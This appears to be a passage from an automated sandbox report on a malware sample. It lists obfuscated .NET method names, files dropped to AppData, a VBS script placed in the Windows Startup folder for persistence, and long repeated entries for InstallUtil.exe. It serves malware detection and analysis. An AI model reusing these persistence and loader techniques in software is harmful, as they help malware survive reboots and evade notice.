                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, O8kqMFCgVIxy7aV2MlK.csHigh entropy of concatenated method names: 'UGgCoSw2Xg', 'MiECLK9Gnk', 'EvMCseW9Tw', 'P30CuTvX6n', 'HjcCeqxioJ', 'wZdCGsSouu', 'WSvCA9ZNYT', 'VKpCjMm3kW', 'nGBCxne5ZF', 'M7OCmUInOE'
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, FP9HXVDzuMtAk48UHIk.csHigh entropy of concatenated method names: 'QbpGdQMsbW', 'HaNGqHJRRm', 'quHGWEPGf3', 'q9PGcg9bQD', 'HtAGUTTqog', 'th2G80WvN7', 'KEqGT8jHHm', 'jm7LQSXx7F', 'lFmG03jtau', 'PHRGfhJIiH'
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, xbmPegaf9KeWIvGwLCh.csHigh entropy of concatenated method names: 'EEAawvM3QK', 'UaEai4Affs', 'PA9aFWbc3U', 'eo2a7E2BDF', 'kqLalSOiJM', 'GSBlJW7uNO7wrtZOCKO', 'nSOhQ27eUbE7PgYfLIT', 'PhqnoX7GHVPpkLH2pA9', 'Fp68nC7Ac5o1lae9SAD', 'tPb9kt7jH22saShNlQX'
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, FOOWUJHFfF8folaxFXM.csHigh entropy of concatenated method names: 'TKv1NeKS1Bq7hJBUAxg', 'yPdp3HKVgdh6L9BdWMs', 'dRQDDtJpFn', 'XhqX9WK1AMV76NFMVQa', 'Ruvnx2KbM33fSjqyToG', 'n3n0ErKYmo2TVfv3Tvg', 'Symsy8KIevtTd1C9H04', 'ejJrOCKhN8HmCidYKyl', 'pqlM1lKPSyijR4iNnMi', 'WTLbZBKnXl8GpFQPXoF'
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, oBaXCmDfWWcAesiu78d.csHigh entropy of concatenated method names: 'TwjRpFSZyR', 'fqRRzGLZIr', 'YJQecBSHy6aftJHspfN', 'rcDrRNSo6nGXWSc5Sx1', 'QAxJMTSDcZgGDEKEIhl', 'kjjip2SLmVhKUX6b8r7', 'Nc4UYMSOobNvoFvXIYr', 'xDDCd2SsoCdub0SgZCD'
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, JY5VB4HeaHM7YahREUb.csHigh entropy of concatenated method names: 'JxGHA16xkG', 'uGaHjt4DFn', 'Lft5oRklBRJsWW8IsbI', 'mClYeskkk999JqicWO2', 'dWNTVdkKZaqRyEAYZ5V', 'KwSrw3kSvj86fYCUOLG', 'scDMJ0kVimaBaXVQus6', 'o9hTNwkBWY5hQDDj3tT', 'R3IkShk5INwtodlKrpW'
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, WpavyhD7EdUgfohP8Q0.csHigh entropy of concatenated method names: 'x0lDIWOJpP', 'PYJDheQoZC', 'qX9DPCkq92', 'rpoDndqSOs', 'mi8D2tqBZW', 'uCWDXQiVFI', 'WoyD32l1sa', 'oDSDyiJoUq', 'bQUDtuo6Cl', 'eCaDpKrHeM'
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'LNJUmKKgiEWpS3nf41K'
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, O8kqMFCgVIxy7aV2MlK.csHigh entropy of concatenated method names: 'UGgCoSw2Xg', 'MiECLK9Gnk', 'EvMCseW9Tw', 'P30CuTvX6n', 'HjcCeqxioJ', 'wZdCGsSouu', 'WSvCA9ZNYT', 'VKpCjMm3kW', 'nGBCxne5ZF', 'M7OCmUInOE'
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, FP9HXVDzuMtAk48UHIk.csHigh entropy of concatenated method names: 'QbpGdQMsbW', 'HaNGqHJRRm', 'quHGWEPGf3', 'q9PGcg9bQD', 'HtAGUTTqog', 'th2G80WvN7', 'KEqGT8jHHm', 'jm7LQSXx7F', 'lFmG03jtau', 'PHRGfhJIiH'
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, xbmPegaf9KeWIvGwLCh.csHigh entropy of concatenated method names: 'EEAawvM3QK', 'UaEai4Affs', 'PA9aFWbc3U', 'eo2a7E2BDF', 'kqLalSOiJM', 'GSBlJW7uNO7wrtZOCKO', 'nSOhQ27eUbE7PgYfLIT', 'PhqnoX7GHVPpkLH2pA9', 'Fp68nC7Ac5o1lae9SAD', 'tPb9kt7jH22saShNlQX'
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, FOOWUJHFfF8folaxFXM.csHigh entropy of concatenated method names: 'TKv1NeKS1Bq7hJBUAxg', 'yPdp3HKVgdh6L9BdWMs', 'dRQDDtJpFn', 'XhqX9WK1AMV76NFMVQa', 'Ruvnx2KbM33fSjqyToG', 'n3n0ErKYmo2TVfv3Tvg', 'Symsy8KIevtTd1C9H04', 'ejJrOCKhN8HmCidYKyl', 'pqlM1lKPSyijR4iNnMi', 'WTLbZBKnXl8GpFQPXoF'
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, oBaXCmDfWWcAesiu78d.csHigh entropy of concatenated method names: 'TwjRpFSZyR', 'fqRRzGLZIr', 'YJQecBSHy6aftJHspfN', 'rcDrRNSo6nGXWSc5Sx1', 'QAxJMTSDcZgGDEKEIhl', 'kjjip2SLmVhKUX6b8r7', 'Nc4UYMSOobNvoFvXIYr', 'xDDCd2SsoCdub0SgZCD'
                    Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, JY5VB4HeaHM7YahREUb.csHigh entropy of concatenated method names: 'JxGHA16xkG', 'uGaHjt4DFn', 'Lft5oRklBRJsWW8IsbI', 'mClYeskkk999JqicWO2', 'dWNTVdkKZaqRyEAYZ5V', 'KwSrw3kSvj86fYCUOLG', 'scDMJ0kVimaBaXVQus6', 'o9hTNwkBWY5hQDDj3tT', 'R3IkShk5INwtodlKrpW'

                    Persistence and Installation Behavior

                    barindex
                    Uses cmd line tools excessively to alter registry or file data
                    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                    Source: C:\Windows\System32\xcopy.exeProcess created: attrib.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exeJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exeJump to behavior
                    Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheJump to dropped file
                    Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheJump to dropped file
                    Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheJump to dropped file
                    Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheJump to dropped file

                    Boot Survival

                    barindex
                    Drops VBS files to the startup folder
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbsJump to dropped file
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbsJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
